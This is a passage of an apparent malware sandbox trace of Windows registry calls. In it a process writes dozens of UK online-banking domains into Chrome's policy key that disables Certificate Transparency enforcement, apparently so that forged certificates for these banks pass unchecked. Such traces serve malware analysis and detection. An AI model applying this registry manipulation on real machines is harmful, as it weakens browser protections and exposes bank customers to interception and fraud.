	[0192.990] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x678) returned 0x0
	[0192.990] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x680, lpdwDisposition=0x0) returned 0x0
	[0192.990] RegSetValueExA (in: hKey=0x680, lpValueName="260", Reserved=0x0, dwType=0x1, lpData="www.asbolb.com", cbData=0xe | out: lpData="www.asbolb.com") returned 0x0
	[0192.991] RegCloseKey (hKey=0x680) returned 0x0
	[0192.991] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x67c) returned 0x0
	[0192.991] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x684, lpdwDisposition=0x0) returned 0x0
	[0192.992] RegSetValueExA (in: hKey=0x684, lpValueName="261", Reserved=0x0, dwType=0x1, lpData="asbolb.com", cbData=0xa | out: lpData="asbolb.com") returned 0x0
	[0192.993] RegCloseKey (hKey=0x684) returned 0x0
	[0192.993] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x680) returned 0x0
	[0192.993] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x688, lpdwDisposition=0x0) returned 0x0
	[0192.993] RegSetValueExA (in: hKey=0x688, lpValueName="262", Reserved=0x0, dwType=0x1, lpData="personal.co-operativebank.co.uk", cbData=0x1f | out: lpData="personal.co-operativebank.co.uk") returned 0x0
	[0192.994] RegCloseKey (hKey=0x688) returned 0x0
	[0192.994] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x684) returned 0x0
	[0192.994] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x68c, lpdwDisposition=0x0) returned 0x0
	[0192.994] RegSetValueExA (in: hKey=0x68c, lpValueName="263", Reserved=0x0, dwType=0x1, lpData="cbfm.saas.cashfac.com", cbData=0x15 | out: lpData="cbfm.saas.cashfac.com") returned 0x0
	[0192.995] RegCloseKey (hKey=0x68c) returned 0x0
	[0192.995] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x688) returned 0x0
	[0192.995] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x690, lpdwDisposition=0x0) returned 0x0
	[0192.995] RegSetValueExA (in: hKey=0x690, lpValueName="264", Reserved=0x0, dwType=0x1, lpData="banking.triodos.co.uk", cbData=0x15 | out: lpData="banking.triodos.co.uk") returned 0x0
	[0192.996] RegCloseKey (hKey=0x690) returned 0x0
	[0192.996] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x68c) returned 0x0
	[0192.996] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x694, lpdwDisposition=0x0) returned 0x0
	[0192.996] RegSetValueExA (in: hKey=0x694, lpValueName="265", Reserved=0x0, dwType=0x1, lpData="ebank.turkishbank.co.uk", cbData=0x17 | out: lpData="ebank.turkishbank.co.uk") returned 0x0
	[0192.997] RegCloseKey (hKey=0x694) returned 0x0
	[0192.997] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x690) returned 0x0
	[0192.997] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x698, lpdwDisposition=0x0) returned 0x0
	[0192.997] RegSetValueExA (in: hKey=0x698, lpValueName="266", Reserved=0x0, dwType=0x1, lpData="nebasilicon.fdecs.com", cbData=0x15 | out: lpData="nebasilicon.fdecs.com") returned 0x0
	[0192.998] RegCloseKey (hKey=0x698) returned 0x0
	[0192.998] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x694) returned 0x0
	[0192.998] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x69c, lpdwDisposition=0x0) returned 0x0
	[0192.998] RegSetValueExA (in: hKey=0x69c, lpValueName="267", Reserved=0x0, dwType=0x1, lpData="infinity.icicibank.co.uk", cbData=0x18 | out: lpData="infinity.icicibank.co.uk") returned 0x0
	[0192.999] RegCloseKey (hKey=0x69c) returned 0x0
	[0192.999] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x698) returned 0x0
	[0192.999] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6a0, lpdwDisposition=0x0) returned 0x0
	[0192.999] RegSetValueExA (in: hKey=0x6a0, lpValueName="268", Reserved=0x0, dwType=0x1, lpData="ibank.theaccessbankukltd.co.uk", cbData=0x1e | out: lpData="ibank.theaccessbankukltd.co.uk") returned 0x0
	[0193.000] RegCloseKey (hKey=0x6a0) returned 0x0
	[0193.000] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x69c) returned 0x0
	[0193.001] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6a4, lpdwDisposition=0x0) returned 0x0
	[0193.001] RegSetValueExA (in: hKey=0x6a4, lpValueName="269", Reserved=0x0, dwType=0x1, lpData="www.standardlife.co.uk", cbData=0x16 | out: lpData="www.standardlife.co.uk") returned 0x0
	[0193.001] RegCloseKey (hKey=0x6a4) returned 0x0
	[0193.002] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6a0) returned 0x0
	[0193.002] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6a8, lpdwDisposition=0x0) returned 0x0
	[0193.002] RegSetValueExA (in: hKey=0x6a8, lpValueName="270", Reserved=0x0, dwType=0x1, lpData="standardlife.co.uk", cbData=0x12 | out: lpData="standardlife.co.uk") returned 0x0
	[0193.003] RegCloseKey (hKey=0x6a8) returned 0x0
	[0193.003] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6a4) returned 0x0
	[0193.003] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6ac, lpdwDisposition=0x0) returned 0x0
	[0193.003] RegSetValueExA (in: hKey=0x6ac, lpValueName="271", Reserved=0x0, dwType=0x1, lpData="www.youinvest.co.uk", cbData=0x13 | out: lpData="www.youinvest.co.uk") returned 0x0
	[0193.004] RegCloseKey (hKey=0x6ac) returned 0x0
	[0193.004] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6a8) returned 0x0
	[0193.004] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6b0, lpdwDisposition=0x0) returned 0x0
	[0193.004] RegSetValueExA (in: hKey=0x6b0, lpValueName="272", Reserved=0x0, dwType=0x1, lpData="youinvest.co.uk", cbData=0xf | out: lpData="youinvest.co.uk") returned 0x0
	[0193.005] RegCloseKey (hKey=0x6b0) returned 0x0
	[0193.005] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6ac) returned 0x0
	[0193.005] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6b4, lpdwDisposition=0x0) returned 0x0
	[0193.005] RegSetValueExA (in: hKey=0x6b4, lpValueName="273", Reserved=0x0, dwType=0x1, lpData="banking.lloydsbank.com", cbData=0x16 | out: lpData="banking.lloydsbank.com") returned 0x0
	[0193.006] RegCloseKey (hKey=0x6b4) returned 0x0
	[0193.006] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6b0) returned 0x0
	[0193.006] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6b8, lpdwDisposition=0x0) returned 0x0
	[0193.006] RegSetValueExA (in: hKey=0x6b8, lpValueName="274", Reserved=0x0, dwType=0x1, lpData="secure.tddirectinvesting.co.uk", cbData=0x1e | out: lpData="secure.tddirectinvesting.co.uk") returned 0x0
	[0193.007] RegCloseKey (hKey=0x6b8) returned 0x0
	[0193.007] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6b4) returned 0x0
	[0193.007] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6bc, lpdwDisposition=0x0) returned 0x0
	[0193.007] RegSetValueExA (in: hKey=0x6bc, lpValueName="275", Reserved=0x0, dwType=0x1, lpData="www.deutschebank-dbdirect.com", cbData=0x1d | out: lpData="www.deutschebank-dbdirect.com") returned 0x0
	[0193.008] RegCloseKey (hKey=0x6bc) returned 0x0
	[0193.008] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6b8) returned 0x0
	[0193.008] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6c0, lpdwDisposition=0x0) returned 0x0
	[0193.008] RegSetValueExA (in: hKey=0x6c0, lpValueName="276", Reserved=0x0, dwType=0x1, lpData="deutschebank-dbdirect.com", cbData=0x19 | out: lpData="deutschebank-dbdirect.com") returned 0x0
	[0193.009] RegCloseKey (hKey=0x6c0) returned 0x0
	[0193.009] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6bc) returned 0x0
	[0193.009] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6c4, lpdwDisposition=0x0) returned 0x0
	[0193.009] RegSetValueExA (in: hKey=0x6c4, lpValueName="277", Reserved=0x0, dwType=0x1, lpData="jpmcsso-uk.jpmorgan.com", cbData=0x17 | out: lpData="jpmcsso-uk.jpmorgan.com") returned 0x0
	[0193.010] RegCloseKey (hKey=0x6c4) returned 0x0
	[0193.010] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6c0) returned 0x0
	[0193.010] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6c8, lpdwDisposition=0x0) returned 0x0
	[0193.011] RegSetValueExA (in: hKey=0x6c8, lpValueName="278", Reserved=0x0, dwType=0x1, lpData="ibank1.bib.barclays.com", cbData=0x17 | out: lpData="ibank1.bib.barclays.com") returned 0x0
	[0193.011] RegCloseKey (hKey=0x6c8) returned 0x0
	[0193.011] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6c4) returned 0x0
	[0193.012] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6cc, lpdwDisposition=0x0) returned 0x0
	[0193.012] RegSetValueExA (in: hKey=0x6cc, lpValueName="279", Reserved=0x0, dwType=0x1, lpData="secure.aldermorebusinesssavings.co.uk", cbData=0x25 | out: lpData="secure.aldermorebusinesssavings.co.uk") returned 0x0
	[0193.012] RegCloseKey (hKey=0x6cc) returned 0x0
	[0193.013] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6c8) returned 0x0
	[0193.013] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6d0, lpdwDisposition=0x0) returned 0x0
	[0193.013] RegSetValueExA (in: hKey=0x6d0, lpValueName="280", Reserved=0x0, dwType=0x1, lpData="www.unity-online.co.uk", cbData=0x16 | out: lpData="www.unity-online.co.uk") returned 0x0
	[0193.014] RegCloseKey (hKey=0x6d0) returned 0x0
	[0193.014] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6cc) returned 0x0
	[0193.014] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6d4, lpdwDisposition=0x0) returned 0x0
	[0193.014] RegSetValueExA (in: hKey=0x6d4, lpValueName="281", Reserved=0x0, dwType=0x1, lpData="unity-online.co.uk", cbData=0x12 | out: lpData="unity-online.co.uk") returned 0x0
	[0193.015] RegCloseKey (hKey=0x6d4) returned 0x0
	[0193.015] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6d0) returned 0x0
	[0193.015] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6d8, lpdwDisposition=0x0) returned 0x0
	[0193.015] RegSetValueExA (in: hKey=0x6d8, lpValueName="282", Reserved=0x0, dwType=0x1, lpData="www.barclayswealth.com", cbData=0x16 | out: lpData="www.barclayswealth.com") returned 0x0
	[0193.016] RegCloseKey (hKey=0x6d8) returned 0x0
	[0193.016] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6d4) returned 0x0
	[0193.016] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6dc, lpdwDisposition=0x0) returned 0x0
	[0193.016] RegSetValueExA (in: hKey=0x6dc, lpValueName="283", Reserved=0x0, dwType=0x1, lpData="barclayswealth.com", cbData=0x12 | out: lpData="barclayswealth.com") returned 0x0
	[0193.017] RegCloseKey (hKey=0x6dc) returned 0x0
	[0193.017] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6d8) returned 0x0
	[0193.017] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6e0, lpdwDisposition=0x0) returned 0x0
	[0193.017] RegSetValueExA (in: hKey=0x6e0, lpValueName="284", Reserved=0x0, dwType=0x1, lpData="uksecure.barclayswealth.com", cbData=0x1b | out: lpData="uksecure.barclayswealth.com") returned 0x0
	[0193.018] RegCloseKey (hKey=0x6e0) returned 0x0
	[0193.018] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6dc) returned 0x0
	[0193.018] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6e4, lpdwDisposition=0x0) returned 0x0
	[0193.018] RegSetValueExA (in: hKey=0x6e4, lpValueName="285", Reserved=0x0, dwType=0x1, lpData="onlinebanking.coutts.com", cbData=0x18 | out: lpData="onlinebanking.coutts.com") returned 0x0
	[0193.019] RegCloseKey (hKey=0x6e4) returned 0x0
	[0193.019] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6e0) returned 0x0
	[0193.019] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6e8, lpdwDisposition=0x0) returned 0x0
	[0193.020] RegSetValueExA (in: hKey=0x6e8, lpValueName="286", Reserved=0x0, dwType=0x1, lpData="www.gerrard.com", cbData=0xf | out: lpData="www.gerrard.com") returned 0x0
	[0193.020] RegCloseKey (hKey=0x6e8) returned 0x0
	[0193.020] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6e4) returned 0x0
	[0193.021] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6ec, lpdwDisposition=0x0) returned 0x0
	[0193.021] RegSetValueExA (in: hKey=0x6ec, lpValueName="287", Reserved=0x0, dwType=0x1, lpData="gerrard.com", cbData=0xb | out: lpData="gerrard.com") returned 0x0
	[0193.021] RegCloseKey (hKey=0x6ec) returned 0x0
	[0193.022] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6e8) returned 0x0
	[0193.022] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6f0, lpdwDisposition=0x0) returned 0x0
	[0193.022] RegSetValueExA (in: hKey=0x6f0, lpValueName="288", Reserved=0x0, dwType=0x1, lpData="uk.hkbea-cyberbanking.com", cbData=0x19 | out: lpData="uk.hkbea-cyberbanking.com") returned 0x0
	[0193.023] RegCloseKey (hKey=0x6f0) returned 0x0
	[0193.023] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6ec) returned 0x0
	[0193.023] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6f4, lpdwDisposition=0x0) returned 0x0
	[0193.023] RegSetValueExA (in: hKey=0x6f4, lpValueName="289", Reserved=0x0, dwType=0x1, lpData="onlinebanking.nationwide.co.uk", cbData=0x1e | out: lpData="onlinebanking.nationwide.co.uk") returned 0x0
	[0193.024] RegCloseKey (hKey=0x6f4) returned 0x0
	[0193.024] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6f0) returned 0x0
	[0193.024] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6f8, lpdwDisposition=0x0) returned 0x0
	[0193.024] RegSetValueExA (in: hKey=0x6f8, lpValueName="290", Reserved=0x0, dwType=0x1, lpData="www.bankline.ulsterbank.co.uk", cbData=0x1d | out: lpData="www.bankline.ulsterbank.co.uk") returned 0x0
	[0193.026] RegCloseKey (hKey=0x6f8) returned 0x0
	[0193.026] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x6f4) returned 0x0
	[0193.026] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x6fc, lpdwDisposition=0x0) returned 0x0
